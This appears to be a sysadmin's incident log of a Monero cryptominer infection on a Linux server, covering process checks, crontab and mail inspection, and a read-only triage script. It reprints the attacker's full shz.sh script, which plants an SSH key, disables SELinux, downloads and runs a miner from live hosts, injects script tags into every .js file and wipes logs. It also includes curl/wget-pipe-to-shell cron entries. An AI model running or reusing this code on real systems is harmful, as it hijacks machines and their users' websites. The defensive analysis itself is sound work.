zigw and nanoWatch, libudev.so and an XMR miner: detection and removal log. Notes on handling an XMR malicious mining script
阿新 • Published: 2018-11-27
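For the past couple of days the server has been consistently loud. At first I assumed a colleague was running a large job, but it went on for a long time with no sign of stopping. I looked into it and found a few suspicious processes responsible; after killing them, the server did go quiet.
But the problem was not over: after a while the server started roaring again. I investigated further, and this is a brief record.
1. The top output shows the following: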
top - 13:38:41 up 7 days, 4:33, 4 users, load average: 80.62, 78.60, 77.78
Tasks: 469 total, 1 running, 465 sleeping, 0 stopped, 3 zombie
%Cpu(s): 99.9 us, 0.1 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 24.4/65756948 [|||||||||||||||||||||||| ]
KiB Swap: 0.0/24367100 [ ]
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
19214 root 20 0 2016184 75664 1416 S 1958 0.1 5606:28 zigw
19369 root 20 0 2016184 55096 1416 S 1951 0.1 5457:32 zigw
29272 root 20 0 294996 62716 4 S 71.2 0.1 126506:29 nanoWatch
2558 root 20 0 21.2g 533096 18008 S 9.9 0.8 0:18.52 java
8830 root 20 0 23.4g 6.1g 18404 S 2.9 9.8 699:47.69 java
25111 root 20 0 23.0g 2.3g 18480 S 0.6 3.6 8:20.14 java
10 root 20 0 0 0 0 S 0.3 0.0 5:07.89 rcu_sched
1315 root 20 0 26812 2308 1504 S 0.3 0.0 1:28.42 systemd-logind
3295 root 20 0 159304 6104 4736 S 0.3 0.0 0:00.10 sshd
3411 root 20 0 162264 2668 1588 R 0.3 0.0 0:00.19 top
3524 root 20 0 1396 868 148 S 0.3 0.0 0:00.01 zlqcduxya
3530 root 20 0 1396 864 148 S 0.3 0.0 0:00.01 ckrdxxjp
9231 root 20 0 24.4g 1.1g 17916 S 0.3 1.8 658:50.70 java
25248 root 20 0 22.2g 935460 13720 S 0.3 1.4 5:00.42 java
41265 mysql 20 0 1975792 398624 8316 S 0.3 0.6 4:00.93 mysqld
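From the output above, three processes have high usage, and there are also 3 zombie processes.
The "3 zombie" in the Tasks line refers to these three zombie processes.
How to kill zombie processes: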
// First list the zombie processes
# ps -A -o stat,ppid,pid,cmd | grep -e "^[Zz]"
// Kill the zombie process (these actions are somewhat risky; take care on a production server)
# kill -9 <pid>
[[email protected] bin]# ps -A -o stat,ppid,pid,cmd |grep -e "^[Zz]"
Zs 22039 22042 [sh] <defunct>
您在 /var/spool/mail/root 中有新郵件
[[email protected] bin]# pwdx 22039 22042
22039: /
22042: 沒有那個程序
Of course, if you have a lot of zombie processes, you can write a small script. The one below is based on one found online:
#ps -A -o stat,ppid,pid,cmd | grep -e '^[Zz]' | awk '{print $2}' | xargs kill -9
Check crontab, then edit it to remove the scheduled tasks:
[[email protected] ~]# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/3 * * * * root /etc/cron.hourly/gcc.sh
What crontab -e shows:
REDIS0006þ^@^@^[email protected] */5 * * * * wget -O .cmd http://c.21-2n.com:43768/shz.sh && bash .cmd
^@^[email protected] */7 * * * * wget -q -O- https://master.minerxmr.ru/start.jpg | bash
^@^[email protected] */5 * * * * curl -fsSL https://master.minerxmr.ru/start.jpg | bash
^@^EBack3? */13 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh
^@^EBack1= * * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh
ÿª^K&à[§9^\
"/tmp/crontab.w3M9PL" [noeol][converted] 11L, 406C
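See what the /etc/shz.sh file is doing
Malware characteristics
The second piece of malware is a Monero (XMR) mining program. Monero seems to have risen quickly in price early this year, so intrusions that plant miners have appeared. The malware works mainly by downloading a script which, once executed, downloads and starts the mining program. The script's contents are shown below. For an analysis of the script's code, see "XMR惡意挖礦案例簡析" (A brief analysis of an XMR malicious mining case), which covers it in great detail.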
# cat /etc/shz.sh
#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/gmbpr2
rtdir="/etc/gmbpr2"
oddir="/etc/gmbpr"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
if [ -f "$oddir" ]
then
    pkill zjgw
    chattr -i /etc/shz.sh
    rm -f /etc/shz.sh
    chattr -i /tmp/shz.sh
    rm -f /tmp/shz.sh
    chattr -i /etc/gmbpr
    rm -f /etc/gmbpr
else
    echo "ok"
fi
if [ -f "$rtdir" ]
then
    echo "goto 1" >> /etc/gmbpr2
    grep -q "46j2h" /etc/config.json
    if [ $? -eq 0 ]; then
        echo "config ok"
    else
        chattr -i /etc/config.json
        rm -f /etc/config.json
    fi
    chattr -i $cont
    if [ -f "$bbdir" ]
    then
        [[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
    else
        [[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
    fi
    [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 700 /root/.ssh/
    [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo >> /root/.ssh/authorized_keys
    [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 600 root/.ssh/authorized_keys
    [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd [email protected]_me" >> /root/.ssh/authorized_keys
    ps -fe|grep zigw |grep -v grep
    if [ $? -ne 0 ]
    then
        cd /etc
        outip=`url icanhazip.com`
        ip=`echo ${outip//./o}`
        if [ -z "$ip" ]; then
            outip=`curl icanhazip.com`
            ip=`echo ${outip//./o}`
        fi
        if [ -z "$ip" ]; then
            ip="unknow"
        fi
        filesize=`ls -l zigw | awk '{ print $5 }'`
        cfg="/etc/config.json"
        file="/etc/zigw"
        if [ -f "$cfg" ]
        then
            echo "exists config"
        else
            if [ -f "$bbdir" ]
            then
                curl --connect-timeout 10 --retry 100 http://140.143.35.89:43768/config.json > /etc/config.json
            elif [ -f "$bbdira" ]
            then
                url --connect-timeout 10 --retry 100 http://140.143.35.89:43768/config.json > /etc/config.json
            elif [ -f "$ccdir" ]
            then
                wget --timeout=10 --tries=100 -P /etc http://140.143.35.89:43768/config.json
            elif [ -f "$ccdira" ]
            then
                get --timeout=10 --tries=100 -P /etc http://140.143.35.89:43768/config.json
            fi
        fi
        if [ -f "$file" ]
        then
            if [ "$filesize" -ne "1467080" ]
            then
                chattr -i /etc/zigw
                rm -f zigw
                if [ -f "$bbdir" ]
                then
                    curl --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /etc/zigw
                elif [ -f "$bbdira" ]
                then
                    url --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /etc/zigw
                elif [ -f "$ccdir" ]
                then
                    wget --timeout=10 --tries=100 -P /etc http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw
                elif [ -f "$ccdira" ]
                then
                    get --timeout=10 --tries=100 -P /etc http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw
                fi
            fi
        else
            if [ -f "$bbdir" ]
            then
                curl --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /etc/zigw
            elif [ -f "$bbdira" ]
            then
                url --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /etc/zigw
            elif [ -f "$ccdir" ]
            then
                wget --timeout=10 --tries=100 -P /etc http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw
            elif [ -f "$ccdira" ]
            then
                get --timeout=10 --tries=100 -P /etc http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw
            fi
        fi
        chmod 777 zigw
        sed -i "s/unknow/${ip}/g" config.json
        sleep 5s
        ./zigw
    else
        echo "runing....."
    fi
    chmod 777 /etc/zigw
    chattr +i /etc/zigw
    chmod 777 /etc/shz.sh
    chattr +i /etc/shz.sh
    shdir='/etc/shz.sh'
    if [ -f "$shdir" ]
    then
        echo "exists shell"
    else
        if [ -f "$bbdir" ]
        then
            curl --connect-timeout 10 --retry 100 http://140.143.35.89:43768/shz.sh > /etc/shz.sh
        elif [ -f "$bbdira" ]
        then
            url --connect-timeout 10 --retry 100 http://140.143.35.89:43768/shz.sh > /etc/shz.sh
        elif [ -f "$ccdir" ]
        then
            wget --timeout=10 --tries=100 -P /etc http://140.143.35.89:43768/shz.sh
        elif [ -f "$ccdira" ]
        then
            get --timeout=10 --tries=100 -P /etc http://140.143.35.89:43768/shz.sh
        fi
        sh /etc/shz.sh
    fi
else
    echo "goto 1" > /tmp/gmbpr2
    chattr -i $cont
    [[ $cont =~ "shz.sh" ]] || echo "* * * * * sh /tmp/shz.sh >/dev/null 2>&1" >> ${crondir}
    ps -fe|grep zigw |grep -v grep
    if [ $? -ne 0 ]
    then
        cd /tmp
        outip=`url icanhazip.com`
        ip=`echo ${outip//./o}`
        if [ -z "$ip" ]; then
            outip=`curl icanhazip.com`
            ip=`echo ${outip//./o}`
        fi
        if [ -z "$ip" ]; then
            ip="unknow"
        fi
        filesize=`ls -l zigw | awk '{ print $5 }'`
        cfg="/tmp/config.json"
        file="/tmp/zigw"
        if [ -f "$cfg" ]
        then
            echo "exists config"
        else
            if [ -f "$bbdir" ]
            then
                curl --connect-timeout 10 --retry 100 http://140.143.35.89:43768/config.json > /tmp/config.json
            elif [ -f "$bbdira" ]
            then
                url --connect-timeout 10 --retry 100 http://140.143.35.89:43768/config.json > /tmp/config.json
            elif [ -f "$ccdir" ]
            then
                wget --timeout=10 --tries=100 -P /tmp http://140.143.35.89:43768/config.json
            elif [ -f "$ccdira" ]
            then
                get --timeout=10 --tries=100 -P /tmp http://140.143.35.89:43768/config.json
            fi
        fi
        if [ -f "$file" ]
        then
            if [ "$filesize" -ne "1467080" ]
            then
                chattr -i /tmp/zigw
                rm -f zigw
                if [ -f "$bbdir" ]
                then
                    curl --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /tmp/zigw
                elif [ -f "$bbdira" ]
                then
                    url --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /tmp/zigw
                elif [ -f "$ccdir" ]
                then
                    wget --timeout=10 --tries=100 -P /tmp http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw
                elif [ -f "$ccdira" ]
                then
                    get --timeout=10 --tries=100 -P /tmp http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw
                fi
            fi
        else
            if [ -f "$bbdir" ]
            then
                curl --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /tmp/zigw
            elif [ -f "$bbdira" ]
            then
                url --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /tmp/zigw
            elif [ -f "$ccdir" ]
            then
                wget --timeout=10 --tries=100 -P /tmp http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw
            elif [ -f "$ccdira" ]
            then
                get --timeout=10 --tries=100 -P /tmp http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw
            fi
        fi
        chmod 777 zigw
        sed -i "s/unknow/${ip}/g" config.json
        sleep 5s
        ./zigw
    else
        echo "runing....."
    fi
    chmod 777 /tmp/zigw
    chattr +i /tmp/zigw
    chmod 777 /tmp/shz.sh
    chattr +i /tmp/shz.sh
    shdir='/tmp/shz.sh'
    if [ -f "$shdir" ]
    then
        echo "exists shell"
    else
        if [ -f "$bbdir" ]
        then
            curl --connect-timeout 10 --retry 100 http://140.143.35.89:43768/shz.sh > /tmp/shz.sh
        elif [ -f "$bbdira" ]
        then
            url --connect-timeout 10 --retry 100 http://140.143.35.89:43768/shz.sh > /tmp/shz.sh
        elif [ -f "$ccdir" ]
        then
            wget --timeout=10 --tries=100 -P /tmp http://140.143.35.89:43768/shz.sh
        elif [ -f "$ccdira" ]
        then
            get --timeout=10 --tries=100 -P /tmp http://140.143.35.89:43768/shz.sh
        fi
        sh /tmp/shz.sh
    fi
fi
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
find / -name '*.js'|xargs grep -L f4ce9|xargs sed -i '$a\document.write\('\'\<script\ src=\"http://t.cn/EvlonFh\"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\;
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
Note these two addresses:
http://c.21-2n.com:43768
http://t.cn/EvlonFh
Searching further, I saw that someone on V2EX had run into this same problem 4 hours earlier. (Reference: https://www.v2ex.com/t/511857)
Check /root/.ssh/authorized_keys for any strange public keys:
[[email protected] ~]# cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd [email protected]_me
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd [email protected]_me
Reference: https://www.cnblogs.com/Rebybyx/p/9913779.html
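The indicators visible in the shz.sh listing, the crontab dump and the authorized_keys output above can be checked in one read-only pass. The script below is an added example, not part of the original post; the root-directory argument, the function names and the sample tree (with a placeholder `example.invalid` host) are assumptions constructed for illustration.

```sh
#!/bin/sh
# Read-only triage for what shz.sh leaves behind. The root argument is "/"
# on a live host or the mount point of a disk image (assumed parameter).

# Files the script drops or renames, taken from the shz.sh listing.
SHZ_PATHS="etc/zigw etc/shz.sh etc/config.json etc/gmbpr etc/gmbpr2
tmp/zigw tmp/shz.sh tmp/config.json tmp/gmbpr2 usr/bin/url usr/bin/get"

# Print each artifact that exists under the given root, one per line.
find_artifacts() {
    for p in $SHZ_PATHS; do
        if [ -e "${1%/}/$p" ]; then echo "/$p"; fi
    done
}

# Read crontab text on stdin and print entries that download a URL and hand
# it to sh/bash. -a makes grep treat the Redis dump bytes as text; "url" and
# "get" are the names shz.sh gives curl and wget.
scan_cron() {
    grep -aE '(^|[^[:alnum:]_])(curl|wget|url|get)[[:space:]].*https?://.*(\||&&)[[:space:]]*(ba)?sh' || true
}

# Count authorized_keys lines holding the key fragment shz.sh tests for.
count_planted_keys() {
    if [ -f "$1" ]; then grep -c 'xvsRtqHLMWoh' "$1" || true; else echo 0; fi
}

# Build a constructed sample tree (not real data) to exercise the checks.
make_sample_root() {
    r=$(mktemp -d)
    mkdir -p "$r/etc" "$r/usr/bin" "$r/root/.ssh" "$r/var/spool/cron"
    : > "$r/etc/zigw"; : > "$r/etc/shz.sh"; : > "$r/usr/bin/url"
    # Redis-dump style crontab: binary header, two planted jobs, one benign job.
    printf 'REDIS0006\376\000\000\005Back2\n' > "$r/var/spool/cron/root"
    cat >> "$r/var/spool/cron/root" <<'EOF'
*/5 * * * * wget -O .cmd http://c2.example.invalid:43768/shz.sh && bash .cmd
*/13 * * * * url -fsSL http://c2.example.invalid:43768/shz.sh | sh
*/3 * * * * /usr/bin/rsync -a /data /backup
EOF
    for i in 1 2; do
        echo "ssh-rsa AAAA-constructed-xvsRtqHLMWoh-constructed sample$i"
    done > "$r/root/.ssh/authorized_keys"
    echo "$r"
}

# Run all three checks against one root.
triage() {
    echo "== artifacts";        find_artifacts "$1"
    echo "== cron downloaders"; scan_cron < "${1%/}/var/spool/cron/root"
    echo "== planted keys: $(count_planted_keys "${1%/}/root/.ssh/authorized_keys")"
}

sample=$(make_sample_root)
triage "$sample"
rm -rf "$sample"
```

As the listing shows, the dropped files are set immutable with `chattr +i`, so they need `chattr -i` before `rm`, and `/usr/bin/url` and `/usr/bin/get` have to be moved back to `curl` and `wget`.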
Look at the files under /usr/bin:
[[email protected] bin]# cat fntmpqdsjxky.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
cp "/usr/bin/fntmpqdsjxky" "/usr/bin/dhgeytmsrf"
"/usr/bin/dhgeytmsrf"
Look at /tmp:
[[email protected] tmp]# ls -la
總用量 448
drwxrwxrwt. 16 root root 4096 11月 27 15:15 .
dr-xr-xr-x. 17 root root 4096 11月 20 09:06 ..
drwx------ 2 root root 19 11月 23 09:46 .esd-0
drwxrwxrwt. 2 root root 6 10月 21 18:16 .font-unix
drwxr-xr-x 2 root root 88 11月 27 14:00 hsperfdata_root
drwxrwxrwt. 2 root root 78 11月 23 09:46 .ICE-unix
-rwxrwxrwx 1 root root 448500 11月 23 20:35 nanoWatch
drwxr-xr-x 4 root root 52 11月 1 15:03 NGINX
drwxr-xr-x 3 root root 24 11月 27 15:15 soft
drwx------ 3 root root 16 11月 14 18:57 systemd-private-608487cde1ba4c3aaf4c6aaa08e00275-mariadb.service-QeGg1y
drwx------ 3 root root 16 11月 20 09:05 systemd-private-c0fb9c6305d7414cbabf5c6cabc16150-chronyd.service-5PnKzn
drwx------ 3 root root 16 11月 23 09:46 systemd-private-c0fb9c6305d7414cbabf5c6cabc16150-colord.service-EwMvPf
drwx------ 3 root root 16 11月 20 09:05 systemd-private-c0fb9c6305d7414cbabf5c6cabc16150-cups.service-WvZk2h
drwxrwxrwt. 2 root root 6 10月 21 18:16 .Test-unix
drwx------ 2 root root 6 11月 15 19:22 tracker-extract-files.0
drwxrwxrwt. 2 root root 6 11月 23 09:51 .X11-unix
drwxrwxrwt. 2 root root 6 10月 21 18:16 .XIM-unix
Look at /var/spool/mail/root:
[[email protected] bin]# cat /var/spool/mail/root
From [email protected] Tue Nov 27 14:40:01 2018
Return-Path: <[email protected]>
X-Original-To: root
Delivered-To: [email protected]
Received: by localhost.localdomain (Postfix, from userid 0) id 6708B1F004E; Tue, 27 Nov 2018 14:40:01 +0800 (CST)
From: "(Cron Daemon)" <[email protected]>
To: [email protected]
Subject: Cron <[email protected]> wget -O .cmd http://c.21-2n.com:43768/shz.sh && bash .cmd
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=7520>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=en_US.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20181127064001[email protected]>
Date: Tue, 27 Nov 2018 14:40:01 +0800 (CST)
/bin/sh: wget: command not found

From [email protected] Tue Nov 27 14:40:01 2018
Return-Path: <[email protected]>
X-Original-To: root
Delivered-To: [email protected]
Received: by localhost.localdomain (Postfix, from userid 0) id 675F897CA9; Tue, 27 Nov 2018 14:40:01 +0800 (CST)
From: "(Cron Daemon)" <[email protected]>
To: [email protected]
Subject: Cron <[email protected]> curl -fsSL https://master.minerxmr.ru/start.jpg | bash
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=7519>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=en_US.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20181127064001[email protected]>
Date: Tue, 27 Nov 2018 14:40:01 +0800 (CST)
/bin/sh: curl: command not found

From [email protected] Tue Nov 27 14:40:01 2018
Return-Path: <[email protected]>
X-Original-To: root
Delivered-To: [email protected]
Received: by localhost.localdomain (Postfix, from userid 0) id 6A2A297CA9; Tue, 27 Nov 2018 14:40:01 +0800 (CST)
From: "(Cron Daemon)" <[email protected]>
To: [email protected]
Subject: Cron <[email protected]> curl -fsSL http://c.21-2n.com:43768/shz.sh | sh
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=7521>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=en_US.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20181127064001[email protected]>
Date: Tue, 27 Nov 2018 14:40:01 +0800 (CST)
/bin/sh: curl: command not found

From [email protected] Tue Nov 27 14:41:01 2018
Return-Path: <[email protected]>
X-Original-To: root
Delivered-To: [email protected]
Received: by localhost.localdomain (Postfix, from userid 0) id 74A7F97CA9; Tue, 27 Nov 2018 14:41:01 +0800 (CST)
From: "(Cron Daemon)" <[email protected]>
To: [email protected]
Subject: Cron <[email protected]> curl -fsSL http://c.21-2n.com:43768/shz.sh | sh
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=7523>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=en_US.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20181127064101[email protected]>
Date: Tue, 27 Nov 2018 14:41:01 +0800 (CST)
/bin/sh: curl: command not found

From [email protected] Tue Nov 27 14:42:01 2018
Return-Path: <[email protected]>
X-Original-To: root
Delivered-To: [email protected]
Received: by localhost.localdomain (Postfix, from userid 0) id 814EF1F0063; Tue, 27 Nov 2018 14:42:01 +0800 (CST)
From: "(Cron Daemon)" <[email protected]>
To: [email protected]
Subject: Cron <[email protected]> curl -fsSL http://c.21-2n.com:43768/shz.sh | sh
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=7526>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=en_US.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20181127064201[email protected]>
Date: Tue, 27 Nov 2018 14:42:01 +0800 (CST)
/bin/sh: curl: command not found

From [email protected] Tue Nov 27 14:42:01 2018
Return-Path: <[email protected]>
X-Original-To: root
Delivered-To: [email protected]
Received: by localhost.localdomain (Postfix, from userid 0) id 81BF11F0064; Tue, 27 Nov 2018 14:42:01 +0800 (CST)
From: "(Cron Daemon)" <[email protected]>
To: [email protected]
Subject: Cron <[email protected]> wget -q -O- https://master.minerxmr.ru/start.jpg | bash
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=7524>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=en_US.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20181127064201[email protected]>
Date: Tue, 27 Nov 2018 14:42:01 +0800 (CST)
/bin/sh: wget: command not found

From [email protected] Tue Nov 27 14:43:01 2018
Return-Path: <[email protected]>
X-Original-To: root
Delivered-To: [email protected]
Received: by localhost.localdomain (Postfix, from userid 0) id 8DF5C1F0064; Tue, 27 Nov 2018 14:43:01 +0800 (CST)
From: "(Cron Daemon)" <[email protected]>
To: [email protected]
Subject: Cron <[email protected]> curl -fsSL http://c.21-2n.com:43768/shz.sh | sh
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=7527>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=en_US.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20181127064301[email protected]>
Date: Tue, 27 Nov 2018 14:43:01 +0800 (CST)
/bin/sh: curl: command not found

From [email protected] Tue Nov 27 14:44:01 2018
Return-Path: <[email protected]>
X-Original-To: root
Delivered-To: [email protected]
Received: by localhost.localdomain (Postfix, from userid 0) id 9A9681F0064; Tue, 27 Nov 2018 14:44:01 +0800 (CST)
From: "(Cron Daemon)" <[email protected]>
To: [email protected]
Subject: Cron <[email protected]> curl -fsSL http://c.21-2n.com:43768/shz.sh | sh
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=7528>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=en_US.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20181127064401[email protected]>
Date: Tue, 27 Nov 2018 14:44:01 +0800 (CST)
/bin/sh: curl: command not found

From [email protected] Tue Nov 27 14:45:01 2018
Return-Path: <[email protected]>
X-Original-To: root
Delivered-To: [email protected]
Received: by localhost.localdomain (Postfix, from userid 0) id A6C171F0064; Tue, 27 Nov 2018 14:45:01 +0800 (CST)
From: "(Cron Daemon)" <[email protected]>
To: [email protected]
Subject: Cron <[email protected]> /etc/cron.hourly/gcc.sh
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=7529>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=en_US.UTF-8>
X-Cron-Env: <SHELL=/bin/bash>